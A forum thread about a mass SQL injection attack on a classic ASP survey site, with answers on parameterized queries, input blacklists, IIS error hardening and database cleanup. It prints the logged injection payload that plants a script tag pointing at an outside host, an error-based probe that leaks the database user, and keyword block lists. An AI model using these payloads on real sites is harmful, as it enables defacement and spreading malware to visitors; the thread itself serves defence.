Attack on an ASP site that uses a SQL Server database

Published 2024-09-24 15:46:04

We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site:
XSS Attack on the ASP.NET Website.

I found multiple entries in our IIS logs that included the malicious code:

</title><script src=http://google-stats49.info/ur.php>

Here is an example of the value of the cs-uri-query field for one of the IIS log entries.

surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.

Does anyone have any suggestions on how to prevent this from happening?

Comments (6)

慢慢从新开始 2024-10-01 15:46:04

That's a SQL injection.

  1. Never trust user input. You're taking input and sending it directly to the database
  2. Never trust your user input!
  3. Check all input against a whitelist of allowed values.
  4. For text input make sure everything is escaped

There are tons on this subject: Google is your friend

夕嗳→ 2024-10-01 15:46:04

Also...

  1. Use parameterized queries.
  2. Get off old classic ASP, which makes it harder to use parameterized queries. Move to .NET, which has easier validation and can restrict values, disallow html input and so on.
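The difference between the two answers above, as an added example written for this page rather than code from the thread. SQLite stands in for SQL Server (assumption: the table is reduced to the two columns the log line names, and `executescript` emulates ADO handing a concatenated string to the driver as one batch; T-SQL would not even need the `;` that SQLite requires between statements). The vulnerable path lets the payload from the question rewrite `categoryName`; the parameterized path binds the same value and the driver never parses it as SQL; the whitelist on top turns garbage into a clean error instead of an empty result. In classic ASP the binding step is `ADODB.Command` with `CreateParameter` and `Parameters.Append`.

```python
import sqlite3

# The tag decoded from the question's log entry.
SCRIPT_TAG = "</title><script src=http://google-stats49.info/ur.php></script>"

# Value an attacker sends for the numeric surveyID parameter. SQL Server needs
# no ';' between batched statements (the logged query has none); SQLite does.
PAYLOAD = ("91; update usd_ResponseDetails set categoryName = categoryName || '"
           + SCRIPT_TAG + "' --")


def fresh_db():
    """Constructed two-row stand-in for the survey table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table usd_ResponseDetails(surveyID integer, categoryName text);
        insert into usd_ResponseDetails values (91, 'Satisfaction'), (92, 'Service');
    """)
    return con


def tampered(con):
    """True once any categoryName carries a script tag."""
    n = con.execute("select count(*) from usd_ResponseDetails "
                    "where categoryName like '%<script%'").fetchone()[0]
    return n > 0


def vulnerable_lookup(con, survey_id):
    """The pattern behind the question: user input glued into the SQL text and the
    whole string handed to the driver, which runs it as a batch."""
    sql = "select categoryName from usd_ResponseDetails where surveyID=" + survey_id
    con.executescript(sql)          # emulates ADO executing the concatenated batch


def parameterized_lookup(con, survey_id):
    """Same query with the value bound: the payload is just a string that matches no row."""
    cur = con.execute("select categoryName from usd_ResponseDetails "
                      "where surveyID = ?", (survey_id,))
    return [row[0] for row in cur.fetchall()]


def safe_lookup(con, survey_id):
    """Whitelist the shape first (an id is digits only), then bind."""
    if not survey_id.isdigit():
        raise ValueError("surveyID must be numeric")
    return parameterized_lookup(con, int(survey_id))


if __name__ == "__main__":
    con = fresh_db()
    vulnerable_lookup(con, PAYLOAD)
    print("concatenated SQL -> table tampered:", tampered(con))
    con = fresh_db()
    print("bound parameter  -> rows:", parameterized_lookup(con, PAYLOAD),
          "tampered:", tampered(con))
    print("whitelist + bind -> rows:", safe_lookup(fresh_db(), "91"))
```

Note that the blacklist-style filters discussed further down are not part of this fix: with the value bound, there is nothing for a keyword filter to catch, and the only validation left is the one that belongs to the application (an id is a number).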

↙温凉少女 2024-10-01 15:46:04

Not sure if this is still relevant for you, but I have had this happen in the past as we still run some old asp sites. There are two things you need to clean this up. First is a find and replace stored procedure for your database (easy enough to Google this), if you can get away with it. Unfortunately sometimes the data is cut off depending on the field type, but there is nothing to do here. Otherwise a roll back for your db is necessary.

Second is insert a SQL injection hack prevention script like this as an include before your database connection:

Good luck.

<% 
'  SqlCheckInclude.asp
'
'  This is the include file to use with your asp pages to 
'  validate input for SQL injection.

Dim BlackList, ErrorPage, s

'
' Below is a black list that will block certain SQL commands and
' sequences used in SQL injection; it will help with input sanitization.
'
' However this may not suffice, because:
' 1) These might not cover all the cases (like encoded characters)
' 2) This may disallow legitimate input
'
' Creating raw SQL query strings by concatenating user input is an
' unsafe programming practice. It is advised that you use parameterized
' SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
' on how to do this using ADO from ASP.
'
' Moreover, you need to also implement a white list for your parameters.
' For example, if you are expecting input for a zipcode you should create
' a validation rule that will only allow 5 characters in [0-9].
'

BlackList = Array("--", ";", "/*", "*/", "@@", "@",_
                  "char", "nchar", "varchar", "nvarchar",_
                  "alter", "begin", "cast", "create", "cursor",_
                  "declare", "delete", "drop", "end", "exec",_
                  "execute", "fetch", "insert", "kill", "open",_
                  "select", "sys", "sysobjects", "syscolumns",_
                  "table", "update")

' Populate the error page you want to redirect to in case the
' check fails.

ErrorPage = "/ErrorPage.asp"

'''''''''''''''''''''''''''''''''''''''''''''''''''
' This function does not check for encoded characters
' since we do not know the form of encoding your application
' uses. Add the appropriate logic to deal with encoded characters
' in here
'''''''''''''''''''''''''''''''''''''''''''''''''''
Function CheckStringForSQL(str)
  On Error Resume Next

  Dim lstr

  ' If the string is empty there is nothing to check: return false
  If ( IsEmpty(str) ) Then
    CheckStringForSQL = false
    Exit Function
  ElseIf ( StrComp(str, "") = 0 ) Then
    CheckStringForSQL = false
    Exit Function
  End If

  lstr = LCase(str)

  ' Check if the string contains any patterns in our
  ' black list (plain substring match, so "Charlotte" hits "char")
  For Each s in BlackList
    If ( InStr (lstr, s) <> 0 ) Then
      CheckStringForSQL = true
      Exit Function
    End If
  Next

  CheckStringForSQL = false
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check forms data
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.Form
  If ( CheckStringForSQL(Request.Form(s)) ) Then
    ' Redirect to an error page
    Response.Redirect(ErrorPage)
  End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check query string
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.QueryString
  If ( CheckStringForSQL(Request.QueryString(s)) ) Then
    ' Redirect to error page
    Response.Redirect(ErrorPage)
  End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check cookies
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.Cookies
  If ( CheckStringForSQL(Request.Cookies(s)) ) Then
    ' Redirect to error page
    Response.Redirect(ErrorPage)
  End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Add additional checks for input that your application
' uses. (for example various request headers your app
' might use)
'''''''''''''''''''''''''''''''''''''''''''''''''''

%>

小女人ら 2024-10-01 15:46:04

Configure your IIS to send a custom error page or the default error 500 page instead of sending detailed error messages to the client.

Detailed error messages have been used to find the db schema. Then they used sql injection to update text fields.

Here's an example to get the DB user:

/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0 

that is "and ^+user+^=0" and it returns:

[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int.

where "myDbUsername" is your real database user.

Using a similar technique it is possible to get databases, tables, columns, types etc. one by one.

If you have not been already attacked then disable detailed errors in IIS, otherwise check your logs to find which pages have sql injection vulnerabilities and correct them.

I wrote a small script to check if there are "<script" in my database:

-- Outer cursor: build one COUNT(*) probe per character column of every base table.
DECLARE c1 CURSOR FOR
    SELECT 'SELECT COUNT(*), ''' + QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) + ''', ''' + QUOTENAME(COLUMN_NAME) + '''' +
           ' FROM ' + QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) +
           ' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
    FROM INFORMATION_SCHEMA.COLUMNS c
    WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
      AND QUOTENAME(TABLE_NAME) NOT IN (SELECT QUOTENAME(name) AS TABLE_NAME FROM sys.views)
    ORDER BY QUOTENAME(TABLE_NAME);
-- The generated statement easily exceeds 200 characters with long schema/table/column names.
DECLARE @CMD VARCHAR(1000), @return VARCHAR(10)
OPEN c1
FETCH NEXT FROM c1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
BEGIN
    -- Inner cursor: run the probe and, on a hit, show the offending rows.
    DECLARE @sql NVARCHAR(1100), @tbl VARCHAR(200), @col VARCHAR(200)
    SET @sql = 'DECLARE c2 CURSOR FOR ' + @CMD
    EXEC sp_executesql @sql
    OPEN c2
    FETCH NEXT FROM c2 INTO @return, @tbl, @col
    WHILE @@FETCH_STATUS <> -1
    BEGIN
        IF (@return > 0)
        BEGIN
            PRINT @return + ' records found in ' + @tbl + '.' + @col
            -- @tbl and @col are already QUOTENAME()d, so this dynamic SQL is safe to build.
            EXEC('SELECT ' + @col + ' FROM ' + @tbl + ' WHERE ' + @col + ' LIKE ''%<script%''')
        END
        FETCH NEXT FROM c2 INTO @return, @tbl, @col
    END
    CLOSE c2
    DEALLOCATE c2
    FETCH NEXT FROM c1 INTO @CMD
END
CLOSE c1
DEALLOCATE c1

I'm on IIS 7, Win Server 2008 and SQL Server 2008 so it doesn't seem this attack uses any SQL Server 2003 / 2005 vulnerabilities as stated in many articles on the web.
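The conversion error quoted above (`Conversion failed when converting nvarchar value '^myDbUsername^' to data type int`) reaches the client only because classic ASP is allowed to send script errors to the browser and IIS is allowed to send detailed error pages to remote clients. The fragments below, added here and not taken from the answer, show the weak `system.webServer` settings beside the hardened ones for a site-level web.config on IIS 7 (attribute names assumed from the IIS 7 `asp` and `httpErrors` configuration sections). Closing the oracle stops the one-column-at-a-time enumeration; it does nothing against the blind `UPDATE` in the question, which needed no response at all, so the injection itself still has to be fixed.

```xml
<!-- Weak: script errors and detailed IIS errors go to any client -->
<configuration>
  <system.webServer>
    <asp scriptErrorSentToBrowser="true" />
    <httpErrors errorMode="Detailed" />
  </system.webServer>
</configuration>

<!-- Hardened: details stay on the server, remote clients get a generic page -->
<configuration>
  <system.webServer>
    <asp scriptErrorSentToBrowser="false"
         scriptErrorMessage="An error occurred while processing your request." />
    <httpErrors errorMode="DetailedLocalOnly" />
  </system.webServer>
</configuration>
```

With `DetailedLocalOnly` you still see the full error when browsing from the server console, which is what you want while tracking down the vulnerable pages in the logs.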

给不了的爱 2024-10-01 15:46:04

You are being hit by the LizaMoon automated SQL injection exploit pack, and are now mentioned in an article on the page of the company that is credited with first documenting the attack: http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

夜无邪 2024-10-01 15:46:04

The BulletProof Security WordPress plugin has the SQL Injection filters that will block this attack in an htaccess file. Since you have an IIS server you would need to add additional features that would enable you to use an htaccess file or maybe you could incorporate the SQL Injection filters in some other way with IIS since htaccess is traditionally an Apache thing. This is the line in the BulletProof Security master htaccess file that blocks ALL SQL Injection hacking attempts:

RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC] 
RewriteRule ^(.*)$ - [F,L]
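Both keyword filters on this page, the `SqlCheckInclude.asp` blacklist in the earlier answer and the `.htaccess` RewriteCond just above, are worth measuring before deploying. The harness below is an added example written for this page, not code from either project: it ports the two checks to Python (the include sees each parameter after IIS has URL-decoded it, as `Request.QueryString(name)` would; the rewrite rule sees the raw `QUERY_STRING`) and runs them over constructed requests, two hostile ones from this thread and four that a survey site must accept. Both catch the attack, and both also reject ordinary input: an e-mail address trips the `@` entry, "weekend" trips `end`, "dataset" trips `set`, and a respondent named Charlotte trips `char` in both lists. The include's own comment says encoded characters are not handled; that is the other half of why a filter is a stopgap, not a fix.

```python
import re
from urllib.parse import unquote_plus

# Substring blacklist from the SqlCheckInclude.asp include posted in an earlier answer.
ASP_BLACKLIST = ["--", ";", "/*", "*/", "@@", "@", "char", "nchar", "varchar", "nvarchar",
                 "alter", "begin", "cast", "create", "cursor", "declare", "delete", "drop",
                 "end", "exec", "execute", "fetch", "insert", "kill", "open", "select",
                 "sys", "sysobjects", "syscolumns", "table", "update"]

# Regex from the BulletProof Security .htaccess line quoted above ([NC] = ignore case).
HTACCESS_RE = re.compile(
    r"^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|"
    r"create|alter|update|order|char|set|cast|convert|meta|script|truncate).*",
    re.IGNORECASE)


def asp_check(value):
    """Port of CheckStringForSQL: True means the request is sent to the error page."""
    if value is None or value == "":
        return False
    lower = value.lower()
    return any(token in lower for token in ASP_BLACKLIST)


def htaccess_check(query_string):
    """RewriteCond against the raw QUERY_STRING: True means a 403."""
    return HTACCESS_RE.match(query_string) is not None


def evaluate(query_string):
    """(blocked by the ASP include, blocked by the .htaccess rule) for one request."""
    asp_blocked = any(asp_check(unquote_plus(pair.partition("=")[2]))
                      for pair in query_string.split("&"))
    return asp_blocked, htaccess_check(query_string)


# Constructed requests. The attack's char() chain is abbreviated to three elements.
SAMPLES = {
    "attack from the question":
        "surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),"
        "cast(char(60)%2Bchar(47)%2Bchar(116)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--",
    "probe from a later answer": "realparameter=1+And+char(94)%2Buser%2Bchar(94)=0",
    "plain id": "surveyID=91",
    "email address": "email=alice%40example.com",
    "free text with 'weekend'": "answer=see+you+at+the+weekend",
    "free text with 'dataset'": "answer=the+dataset+loaded+fine",
    "name Charlotte": "name=Charlotte",
}


def evaluate_all(samples=SAMPLES):
    """Map each sample name to its (asp_blocked, htaccess_blocked) verdict."""
    return {name: evaluate(qs) for name, qs in samples.items()}


if __name__ == "__main__":
    for name, (asp, ht) in evaluate_all().items():
        print(f"{name:28s} include={'BLOCK' if asp else 'pass ':5s} htaccess={'BLOCK' if ht else 'pass'}")
```

If you do keep a filter while the pages are being fixed, log what it rejects and review the rejects: the false positives above are exactly the kind of survey answers the site exists to collect.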